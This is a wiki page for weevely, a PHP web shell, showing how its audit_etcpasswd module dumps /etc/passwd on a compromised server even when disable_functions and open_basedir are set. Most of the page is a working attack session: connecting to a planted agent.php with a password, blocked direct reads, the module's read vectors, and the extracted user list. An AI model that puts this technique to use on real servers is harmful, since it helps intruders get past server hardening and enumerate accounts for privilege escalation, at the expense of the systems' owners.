-
Notifications
You must be signed in to change notification settings - Fork 605
Get etc passwd content with no read access
epinna edited this page Sep 20, 2014
·
1 revision
Certain PHP configurations prevent the execution of external shell commands (with disable_functions
) and preventing the escape from the web root folder (see open_basedir
). This avoids any direct access to any system files useful to gather more information to conduct any privilege escalation attack as /etc/passwd.
The module audit_etcpasswd
will print the /etc/passwd contents without reading it.
-
Example PHP configuration:
disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
andopen_basedir = /var/www/html/
-
Used modules:
audit_etcpasswd
No external shell commands are available here, due to the only available shell is the PHP interpreter
. Try to access directly to the target file.
$ ./weevely.py http://target/agent.php mypassword
[+] weevely 3.0
[+] Target: target
[+] Session: _weevely/sessions/target/agent_1.session
[+] Shell: PHP interpreter
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
www-data@target:/var/www/html PHP> cd /etc
[-][cd] Failed cd '/etc': no such directory or permission denied
www-data@target:/var/www/html PHP> cat /etc/passwd
[-][download] File download failed, please check remote path and permissions
No direct access is possible. Anyway the module audit_etcpasswd
can enumerate the users entries.
www-data@target:/var/www/html PHP> :audit_etcpasswd --help
usage: audit_etcpasswd [-h] [-real]
[-vector {posix_getpwuid,file,fread,file_get_contents,base64}]
Get /etc/passwd with different techniques.
optional arguments:
-h, --help show this help message and exit
-real Filter only real users
-vector {posix_getpwuid,file,fread,file_get_contents,base64}
www-data@target:/var/www/html PHP> :audit_etcpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
yzer:x:1000:1000:yzer,,,:/home/yzer:/bin/bash
www-data@target:/var/www/html PHP>
And the /etc/passwd content has been extracted anyway.